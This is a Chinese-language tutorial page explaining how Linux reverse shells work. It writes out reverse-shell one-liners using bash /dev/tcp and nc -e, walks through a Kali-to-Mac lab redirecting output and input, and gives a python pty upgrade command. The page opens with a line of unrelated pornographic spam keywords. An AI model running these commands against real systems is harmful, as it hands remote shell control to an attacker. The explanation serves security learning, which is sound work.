欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

linux反彈shell的原理詳解

 更新時間:2020年10月16日 10:06:59   作者:Shanfenglan7  
這篇文章主要介紹了linux反彈shell的原理詳解,文中通過示例代碼介紹的非常詳細,對大家的學習或者工作具有一定的參考學習價值,需要的朋友們下面隨著小編來一起學習學習吧

完整命令

反彈shell命令:

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
bash -i > /dev/tcp/ip/port 0>&1 2>&1

利用nc反彈shell:

nc -lvvp 12345 -t -e /bin/bash

原理

bash -i > /dev/tcp/ip/port 0>&1 2>&1
bash -i 打開一個交互式的bash
&是為了區(qū)分文件1和文件描述符1的
a>&b 的意思是 a>b 2>&1
0代表輸入 ,0>&1 意思是,將輸出的窗口上所輸入的值當作當前窗口的輸入。反彈shell后會有兩個窗口,即靶機的shell窗口跟攻擊機的shell口。這命令的意思也可以理解為,將攻擊機窗口的輸入當作靶機窗口的輸入最終輸入給靶機。2代表標準錯誤輸出。

實驗

通過一個小實驗幫助大家理解

第一步,將shell的正確輸出重定向到外部主機

假設我們在kali上輸入的命令為:
bash -i > /dev/tcp/192.168.124.1/9999,這句話的意思是將交互式shell的標準輸出重定向到192.168.124.1的9999端口。

在mac上監(jiān)聽端口命令為:nc -l 9999

在這里插入圖片描述

首先在kali上輸入whoami命令,發(fā)現(xiàn)沒有回顯,因為回顯被重定向到了mac上。

在這里插入圖片描述

但是當我們在kali上出入錯誤命令的時候,卻存在回顯。

在這里插入圖片描述

第二步,將錯誤輸出重定向到外部主機

我們只需要在上面的命令后面加上 2>&1即可,意思為將錯誤輸出重定向到標準輸出上,也就是重定向到我們的外部主機。

在這里插入圖片描述

這時候發(fā)現(xiàn)在kali上按鍵盤已經(jīng)沒有任何回顯了,回顯全部出現(xiàn)在了mac的shell上:

在這里插入圖片描述

這是因為我們已經(jīng)將所有的輸出都重定向到了外部主機上,但問題是現(xiàn)在我們的控制權還在kali上,mac無法進行任何輸出操作,只能顯示輸出。這時候我們幾句需要將輸入的權限給予我們的mac。

第三步,交出輸入權限

只需要在第二步命令的基礎上加上 0>&1即可。

在這里插入圖片描述

這時候已經(jīng)可以在mac上完全控制kali的shell了,實驗結束。

其他

當shell不穩(wěn)定時候用python的虛擬化終端:

python -c "import pty;pty.spawn('/bin/bash')"

參考:
https://www.freebuf.com/news/142195.html #將shell轉(zhuǎn)換成完全tty
https://blog.csdn.net/Auuuuuuuu/article/details/89059176
https://www.anquanke.com/post/id/87017

到此這篇關于linux反彈shell的原理詳解的文章就介紹到這了,更多相關linux反彈shell內(nèi)容請搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關文章希望大家以后多多支持腳本之家!

相關文章

  • shell腳本之判斷輸入?yún)?shù)是否為整數(shù)值的實例

    shell腳本之判斷輸入?yún)?shù)是否為整數(shù)值的實例

    今天小編就為大家分享一篇shell腳本之判斷輸入?yún)?shù)是否為整數(shù)值的實例,具有很好的參考價值,希望對大家有所幫助。一起跟隨小編過來看看吧
    2018-07-07
  • LINUX下的流量監(jiān)控shell腳本

    LINUX下的流量監(jiān)控shell腳本

    這篇文章主要介紹了LINUX下的流量監(jiān)控shell腳本,可以適用任何Linux版本,需要的朋友可以參考下
    2014-04-04
  • Linux?中的export與alias命令詳解

    Linux?中的export與alias命令詳解

    export和alias都是用來簡化命令行輸入的工具。export用于設置環(huán)境變量,環(huán)境變量是一些系統(tǒng)級別的變量,用于指定一些系統(tǒng)的默認值或者搜索路徑等,這篇文章主要介紹了Linux?中的export與alias命令,需要的朋友可以參考下
    2023-04-04
  • linux shell發(fā)送Email郵件的方法詳解

    linux shell發(fā)送Email郵件的方法詳解

    這篇文章主要介紹了linux shell發(fā)送Email郵件的方法,文中介紹的內(nèi)容包括發(fā)送一封簡單的郵件、郵件的格式、郵件標題使用中文以及郵件內(nèi)容使用html等相關資料,需要的朋友可以參考借鑒,下面來一起看看吧。
    2017-01-01
  • Linux中的grep?-v、-e、-E用法小結

    Linux中的grep?-v、-e、-E用法小結

    grep是一種強大的文本搜索工具,它能使用正則表達式搜索文本,并把匹配的行打印出來,這篇文章主要介紹了Linux之grep?-v、-e、-E用法總結,需要的朋友可以參考下
    2022-11-11
  • Shell中調(diào)用、引用、包含另一個腳本文件的三種方法

    Shell中調(diào)用、引用、包含另一個腳本文件的三種方法

    這篇文章主要介紹了Shell中調(diào)用、引用、包含另一個腳本文件的三種方法,需要的朋友可以參考下
    2014-04-04
  • Shell中使用grep、sed正則提取和替換字符串

    Shell中使用grep、sed正則提取和替換字符串

    這篇文章主要介紹了Shell中使用grep、sed正則提取和替換字符串,文中通過示例代碼介紹的非常詳細,對大家的學習或者工作具有一定的參考學習價值,需要的朋友們下面隨著小編來一起學習學習吧
    2020-12-12
  • 什么是Shell?Shell腳本基礎知識詳細介紹

    什么是Shell?Shell腳本基礎知識詳細介紹

    這篇文章主要介紹了什么是Shell?Shell腳本基礎知識介紹,本文是一篇Shell腳本入門文章,在本文你可學到什么是Shell、有多少種Shell、一個Shell腳本代碼實例,需要的朋友可以參考下
    2014-07-07
  • Shell腳本注釋寫法

    Shell腳本注釋寫法

    這篇文章主要介紹了Shell腳本注釋的3種寫法,包含單行注釋的方法和多行注釋的多種方法,需要的朋友可以參考下
    2014-07-07
  • linux shell 根據(jù)進程名獲取pid的實現(xiàn)方法

    linux shell 根據(jù)進程名獲取pid的實現(xiàn)方法

    這篇文章主要介紹了linux shell 根據(jù)進程名獲取pid的實現(xiàn)方法,文中通過示例代碼介紹的非常詳細,對大家的學習或者工作具有一定的參考學習價值,需要的朋友們下面隨著小編來一起學習學習吧
    2020-05-05

最新評論